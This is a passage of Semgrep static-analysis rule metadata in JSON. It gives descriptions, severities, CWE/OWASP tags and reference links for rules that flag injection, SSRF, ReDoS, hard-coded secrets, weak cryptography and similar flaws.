Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.deserialization.tainted-pandas-pickle-fastapi.tainted-pandas-pickle-fastapi"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"JWT token detected"},"help":{"markdown":"JWT token detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-jwt-token.detected-jwt-token)\n - [https://semgrep.dev/blog/2020/hardcoded-secrets-unverified-tokens-and-other-common-jwt-mistakes/](https://semgrep.dev/blog/2020/hardcoded-secrets-unverified-tokens-and-other-common-jwt-mistakes/)\n","text":"JWT token detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-jwt-token.detected-jwt-token","id":"generic.secrets.security.detected-jwt-token.detected-jwt-token","name":"generic.secrets.security.detected-jwt-token.detected-jwt-token","properties":{"precision":"very-high","tags":["CWE-321: Use of Hard-coded Cryptographic Key","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-jwt-token.detected-jwt-token"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The Dockerfile(image) mounts docker.sock to the container which may allow an attacker already inside of the container to escape container and execute arbitrary commands on the host machine."},"help":{"markdown":"The Dockerfile(image) mounts docker.sock to the container which may allow an attacker already inside of the container to escape container and execute arbitrary commands on the host machine.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/dockerfile.security.dockerd-socket-mount.dockerfile-dockerd-socket-mount)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html)\n - [https://redfoxsec.com/blog/insecure-volume-mounts-in-docker/](https://redfoxsec.com/blog/insecure-volume-mounts-in-docker/)\n - [https://blog.quarkslab.com/why-is-exposing-the-docker-socket-a-really-bad-idea.html](https://blog.quarkslab.com/why-is-exposing-the-docker-socket-a-really-bad-idea.html)\n","text":"The Dockerfile(image) mounts docker.sock to the container which may allow an attacker already inside of the container to escape container and execute arbitrary commands on the host machine."},"helpUri":"https://semgrep.dev/r/dockerfile.security.dockerd-socket-mount.dockerfile-dockerd-socket-mount","id":"dockerfile.security.dockerd-socket-mount.dockerfile-dockerd-socket-mount","name":"dockerfile.security.dockerd-socket-mount.dockerfile-dockerd-socket-mount","properties":{"precision":"very-high","tags":["CWE-269: Improper Privilege Management","CWE-862: Missing Authorization","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: dockerfile.security.dockerd-socket-mount.dockerfile-dockerd-socket-mount"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.diesel.mysql-connection-url.mysql-connection-url)\n - [https://docs.diesel.rs/master/diesel/index.html](https://docs.diesel.rs/master/diesel/index.html)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.diesel.mysql-connection-url.mysql-connection-url","id":"rust.secrets.diesel.mysql-connection-url.mysql-connection-url","name":"rust.secrets.diesel.mysql-connection-url.mysql-connection-url","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.diesel.mysql-connection-url.mysql-connection-url"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"The libxml2 library is used to parse XML. When auditing such code, make sure that either the document being parsed is trusted or that the parsing options are safe to consume untrusted documents. In such case make sure DTD or XInclude documents cannot be loaded and there is no network access."},"help":{"markdown":"The libxml2 library is used to parse XML. When auditing such code, make sure that either the document being parsed is trusted or that the parsing options are safe to consume untrusted documents. In such case make sure DTD or XInclude documents cannot be loaded and there is no network access.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.libxml2.security.libxml2-audit-parser.libxml2-audit-parser)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"The libxml2 library is used to parse XML. When auditing such code, make sure that either the document being parsed is trusted or that the parsing options are safe to consume untrusted documents. In such case make sure DTD or XInclude documents cannot be loaded and there is no network access."},"helpUri":"https://semgrep.dev/r/cpp.libxml2.security.libxml2-audit-parser.libxml2-audit-parser","id":"cpp.libxml2.security.libxml2-audit-parser.libxml2-audit-parser","name":"cpp.libxml2.security.libxml2-audit-parser.libxml2-audit-parser","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.libxml2.security.libxml2-audit-parser.libxml2-audit-parser"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"User-controllable string passed to Razor.Parse. This leads directly to code execution in the context of the process."},"help":{"markdown":"User-controllable string passed to Razor.Parse. This leads directly to code execution in the context of the process.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet.security.razor-template-injection.razor-template-injection)\n - [https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/](https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/)\n","text":"User-controllable string passed to Razor.Parse. This leads directly to code execution in the context of the process."},"helpUri":"https://semgrep.dev/r/csharp.dotnet.security.razor-template-injection.razor-template-injection","id":"csharp.dotnet.security.razor-template-injection.razor-template-injection","name":"csharp.dotnet.security.razor-template-injection.razor-template-injection","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet.security.razor-template-injection.razor-template-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The regular expression identified appears vulnerable to Regular Expression Denial of Service (ReDoS) through catastrophic backtracking. If the input is attacker controllable, this vulnerability can lead to systems being non-responsive or may crash due to ReDoS. Where possible, re-write the regex so as not to leverage backtracking or use a library that offers default protection against ReDoS."},"help":{"markdown":"The regular expression identified appears vulnerable to Regular Expression Denial of Service (ReDoS) through catastrophic backtracking. If the input is attacker controllable, this vulnerability can lead to systems being non-responsive or may crash due to ReDoS. Where possible, re-write the regex so as not to leverage backtracking or use a library that offers default protection against ReDoS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.regex.tainted-regex-stdlib-flask.tainted-regex-stdlib-flask)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html)\n - [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)\n - [https://www.regular-expressions.info/catastrophic.html](https://www.regular-expressions.info/catastrophic.html)\n","text":"The regular expression identified appears vulnerable to Regular Expression Denial of Service (ReDoS) through catastrophic backtracking. If the input is attacker controllable, this vulnerability can lead to systems being non-responsive or may crash due to ReDoS. Where possible, re-write the regex so as not to leverage backtracking or use a library that offers default protection against ReDoS."},"helpUri":"https://semgrep.dev/r/python.flask.regex.tainted-regex-stdlib-flask.tainted-regex-stdlib-flask","id":"python.flask.regex.tainted-regex-stdlib-flask.tainted-regex-stdlib-flask","name":"python.flask.regex.tainted-regex-stdlib-flask.tainted-regex-stdlib-flask","properties":{"precision":"very-high","tags":["CWE-1333: Inefficient Regular Expression Complexity","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.regex.tainted-regex-stdlib-flask.tainted-regex-stdlib-flask"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected `$REQ` argument enters calls to `RegExp`. This could lead to a Regular Expression Denial of Service (ReDoS) through catastrophic backtracking. If the input is attacker controllable, this vulnerability can lead to systems being non-responsive or may crash due to ReDoS. Where possible avoid calls to `RegExp` with user input, if required ensure user input is escaped or validated. "},"help":{"markdown":"Detected `$REQ` argument enters calls to `RegExp`. This could lead to a Regular Expression Denial of Service (ReDoS) through catastrophic backtracking. If the input is attacker controllable, this vulnerability can lead to systems being non-responsive or may crash due to ReDoS. Where possible avoid calls to `RegExp` with user input, if required ensure user input is escaped or validated. \n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.regexp-redos.regexp-redos)\n - [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)\n - [https://www.regular-expressions.info/catastrophic.html](https://www.regular-expressions.info/catastrophic.html)\n","text":"Detected `$REQ` argument enters calls to `RegExp`. This could lead to a Regular Expression Denial of Service (ReDoS) through catastrophic backtracking. If the input is attacker controllable, this vulnerability can lead to systems being non-responsive or may crash due to ReDoS. Where possible avoid calls to `RegExp` with user input, if required ensure user input is escaped or validated. "},"helpUri":"https://semgrep.dev/r/javascript.express.regexp-redos.regexp-redos","id":"javascript.express.regexp-redos.regexp-redos","name":"javascript.express.regexp-redos.regexp-redos","properties":{"precision":"very-high","tags":["CWE-1333: Inefficient Regular Expression Complexity","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.regexp-redos.regexp-redos"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Older Java application servers are vulnerable to HTTP response splitting, which may occur if an HTTP request can be injected with CRLF characters. This finding is reported for completeness; it is recommended to ensure your environment is not affected by testing this yourself."},"help":{"markdown":"Older Java application servers are vulnerable to HTTP response splitting, which may occur if an HTTP request can be injected with CRLF characters. This finding is reported for completeness; it is recommended to ensure your environment is not affected by testing this yourself.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.http-response-splitting.http-response-splitting)\n - [https://www.owasp.org/index.php/HTTP_Response_Splitting](https://www.owasp.org/index.php/HTTP_Response_Splitting)\n","text":"Older Java application servers are vulnerable to HTTP response splitting, which may occur if an HTTP request can be injected with CRLF characters. This finding is reported for completeness; it is recommended to ensure your environment is not affected by testing this yourself."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.http-response-splitting.http-response-splitting","id":"java.lang.security.audit.http-response-splitting.http-response-splitting","name":"java.lang.security.audit.http-response-splitting.http-response-splitting","properties":{"precision":"very-high","tags":["CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.http-response-splitting.http-response-splitting"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Translated strings will not be escaped when rendered in a template. This leads to a vulnerability where translators could include malicious script tags in their translations. Consider using `force_escape` to explicitly escape a translated text."},"help":{"markdown":"Translated strings will not be escaped when rendered in a template. This leads to a vulnerability where translators could include malicious script tags in their translations. Consider using `force_escape` to explicitly escape a translated text.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.audit.xss.template-blocktranslate-no-escape.template-blocktranslate-no-escape)\n - [https://edx.readthedocs.io/projects/edx-developer-guide/en/latest/preventing_xss/preventing_xss_in_django_templates.html#html-escaping-translations-in-django-templates](https://edx.readthedocs.io/projects/edx-developer-guide/en/latest/preventing_xss/preventing_xss_in_django_templates.html#html-escaping-translations-in-django-templates)\n - [https://docs.djangoproject.com/en/3.1/topics/i18n/translation/#internationalization-in-template-code](https://docs.djangoproject.com/en/3.1/topics/i18n/translation/#internationalization-in-template-code)\n","text":"Translated strings will not be escaped when rendered in a template. This leads to a vulnerability where translators could include malicious script tags in their translations. Consider using `force_escape` to explicitly escape a translated text."},"helpUri":"https://semgrep.dev/r/python.django.security.audit.xss.template-blocktranslate-no-escape.template-blocktranslate-no-escape","id":"python.django.security.audit.xss.template-blocktranslate-no-escape.template-blocktranslate-no-escape","name":"python.django.security.audit.xss.template-blocktranslate-no-escape.template-blocktranslate-no-escape","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.audit.xss.template-blocktranslate-no-escape.template-blocktranslate-no-escape"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"the `encoding` argument to Popen is only available on Python 3.6+"},"help":{"markdown":"the `encoding` argument to Popen is only available on Python 3.6+\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.compatibility.python36.python36-compatibility-Popen2)\n","text":"the `encoding` argument to Popen is only available on Python 3.6+"},"helpUri":"https://semgrep.dev/r/python.lang.compatibility.python36.python36-compatibility-Popen2","id":"python.lang.compatibility.python36.python36-compatibility-Popen2","name":"python.lang.compatibility.python36.python36-compatibility-Popen2","properties":{"precision":"very-high","tags":[]},"shortDescription":{"text":"Semgrep Finding: python.lang.compatibility.python36.python36-compatibility-Popen2"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Snyk API Key detected"},"help":{"markdown":"Snyk API Key detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-snyk-api-key.detected-snyk-api-key)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Snyk API Key detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-snyk-api-key.detected-snyk-api-key","id":"generic.secrets.security.detected-snyk-api-key.detected-snyk-api-key","name":"generic.secrets.security.detected-snyk-api-key.detected-snyk-api-key","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-snyk-api-key.detected-snyk-api-key"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"'Integer.toHexString()' strips leading zeroes from each byte if read byte-by-byte. This mistake weakens the hash value computed since it introduces more collisions. Use 'String.format(\"%02X\", ...)' instead."},"help":{"markdown":"'Integer.toHexString()' strips leading zeroes from each byte if read byte-by-byte. This mistake weakens the hash value computed since it introduces more collisions. Use 'String.format(\"%02X\", ...)' instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.bad-hexa-conversion.bad-hexa-conversion)\n - [https://cwe.mitre.org/data/definitions/704.html](https://cwe.mitre.org/data/definitions/704.html)\n","text":"'Integer.toHexString()' strips leading zeroes from each byte if read byte-by-byte. This mistake weakens the hash value computed since it introduces more collisions. Use 'String.format(\"%02X\", ...)' instead."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.bad-hexa-conversion.bad-hexa-conversion","id":"java.lang.security.audit.bad-hexa-conversion.bad-hexa-conversion","name":"java.lang.security.audit.bad-hexa-conversion.bad-hexa-conversion","properties":{"precision":"very-high","tags":["CWE-704: Incorrect Type Conversion or Cast","LOW CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.bad-hexa-conversion.bad-hexa-conversion"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.os.tainted-os-command-stdlib-flask-secure-if-array.tainted-os-command-stdlib-flask-secure-if-array)\n - [https://docs.python.org/3/library/os.html](https://docs.python.org/3/library/os.html)\n - [https://docs.python.org/3/library/subprocess.html#subprocess.Popen](https://docs.python.org/3/library/subprocess.html#subprocess.Popen)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n - [https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html](https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"helpUri":"https://semgrep.dev/r/python.flask.os.tainted-os-command-stdlib-flask-secure-if-array.tainted-os-command-stdlib-flask-secure-if-array","id":"python.flask.os.tainted-os-command-stdlib-flask-secure-if-array.tainted-os-command-stdlib-flask-secure-if-array","name":"python.flask.os.tainted-os-command-stdlib-flask-secure-if-array.tainted-os-command-stdlib-flask-secure-if-array","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.os.tainted-os-command-stdlib-flask-secure-if-array.tainted-os-command-stdlib-flask-secure-if-array"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Database instance has no logging. Missing logs can cause missing important event information."},"help":{"markdown":"Database instance has no logging. Missing logs can cause missing important event information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-db-instance-no-logging.aws-db-instance-no-logging)\n - [https://owasp.org/Top10/A04_2021-Insecure_Design](https://owasp.org/Top10/A04_2021-Insecure_Design)\n","text":"Database instance has no logging. Missing logs can cause missing important event information."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-db-instance-no-logging.aws-db-instance-no-logging","id":"terraform.aws.security.aws-db-instance-no-logging.aws-db-instance-no-logging","name":"terraform.aws.security.aws-db-instance-no-logging.aws-db-instance-no-logging","properties":{"precision":"very-high","tags":["CWE-311: Missing Encryption of Sensitive Data","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-db-instance-no-logging.aws-db-instance-no-logging"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.hardcoded.headers.hardcoded-basic-token.hardcoded-basic-token)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.lang.hardcoded.headers.hardcoded-basic-token.hardcoded-basic-token","id":"python.lang.hardcoded.headers.hardcoded-basic-token.hardcoded-basic-token","name":"python.lang.hardcoded.headers.hardcoded-basic-token.hardcoded-basic-token","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.hardcoded.headers.hardcoded-basic-token.hardcoded-basic-token"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected ARC4 cipher algorithm which is considered insecure. This algorithm is not cryptographically secure and can be reversed easily. Use secure stream ciphers such as ChaCha20, XChaCha20 and Salsa20, or a block cipher such as AES with a block size of 128 bits. When using a block cipher, use a modern mode of operation that also provides authentication, such as GCM."},"help":{"markdown":"Detected ARC4 cipher algorithm which is considered insecure. This algorithm is not cryptographically secure and can be reversed easily. Use secure stream ciphers such as ChaCha20, XChaCha20 and Salsa20, or a block cipher such as AES with a block size of 128 bits. When using a block cipher, use a modern mode of operation that also provides authentication, such as GCM.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pycryptodome.security.insecure-cipher-algorithm-rc4.insecure-cipher-algorithm-rc4)\n - [https://cwe.mitre.org/data/definitions/326.html](https://cwe.mitre.org/data/definitions/326.html)\n - [https://www.pycryptodome.org/src/cipher/cipher](https://www.pycryptodome.org/src/cipher/cipher)\n","text":"Detected ARC4 cipher algorithm which is considered insecure. This algorithm is not cryptographically secure and can be reversed easily. Use secure stream ciphers such as ChaCha20, XChaCha20 and Salsa20, or a block cipher such as AES with a block size of 128 bits. When using a block cipher, use a modern mode of operation that also provides authentication, such as GCM."},"helpUri":"https://semgrep.dev/r/python.pycryptodome.security.insecure-cipher-algorithm-rc4.insecure-cipher-algorithm-rc4","id":"python.pycryptodome.security.insecure-cipher-algorithm-rc4.insecure-cipher-algorithm-rc4","name":"python.pycryptodome.security.insecure-cipher-algorithm-rc4.insecure-cipher-algorithm-rc4","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.pycryptodome.security.insecure-cipher-algorithm-rc4.insecure-cipher-algorithm-rc4"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.micronaut.ssrf.httpclient-taint-concat.httpclient-taint-concat)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/java.micronaut.ssrf.httpclient-taint-concat.httpclient-taint-concat","id":"java.micronaut.ssrf.httpclient-taint-concat.httpclient-taint-concat","name":"java.micronaut.ssrf.httpclient-taint-concat.httpclient-taint-concat","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","HIGH CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: java.micronaut.ssrf.httpclient-taint-concat.httpclient-taint-concat"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The use of the MD2 hashing algorithm was identified which is considered insecure. MD2 is not collision resistant and is therefore not suitable for cryptographic or secure use-cases. Use stronger algorithms such as SHA256, SHA512, or adaptive hashing algorithms such as argon2 or bcrypt."},"help":{"markdown":"The use of the MD2 hashing algorithm was identified which is considered insecure. MD2 is not collision resistant and is therefore not suitable for cryptographic or secure use-cases. Use stronger algorithms such as SHA256, SHA512, or adaptive hashing algorithms such as argon2 or bcrypt.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.insecure-hashing-algorithm-md2.insecure-hashing-algorithm-md2)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n","text":"The use of the MD2 hashing algorithm was identified which is considered insecure. MD2 is not collision resistant and is therefore not suitable for cryptographic or secure use-cases. Use stronger algorithms such as SHA256, SHA512, or adaptive hashing algorithms such as argon2 or bcrypt."},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.insecure-hashing-algorithm-md2.insecure-hashing-algorithm-md2","id":"swift.commoncrypto.insecure-hashing-algorithm-md2.insecure-hashing-algorithm-md2","name":"swift.commoncrypto.insecure-hashing-algorithm-md2.insecure-hashing-algorithm-md2","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.insecure-hashing-algorithm-md2.insecure-hashing-algorithm-md2"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.file.tainted-shelve.tainted-shelve)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"helpUri":"https://semgrep.dev/r/python.lang.file.tainted-shelve.tainted-shelve","id":"python.lang.file.tainted-shelve.tainted-shelve","name":"python.lang.file.tainted-shelve.tainted-shelve","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.file.tainted-shelve.tainted-shelve"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"`strlen(...)` returns the number of characters in a string, excluding the NUL terminator. If a string is later copied into this allocated buffer, it will trigger memory corruption."},"help":{"markdown":"`strlen(...)` returns the number of characters in a string, excluding the NUL terminator. If a string is later copied into this allocated buffer, it will trigger memory corruption.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.strings.alloc-strlen.alloc-strlen)\n - 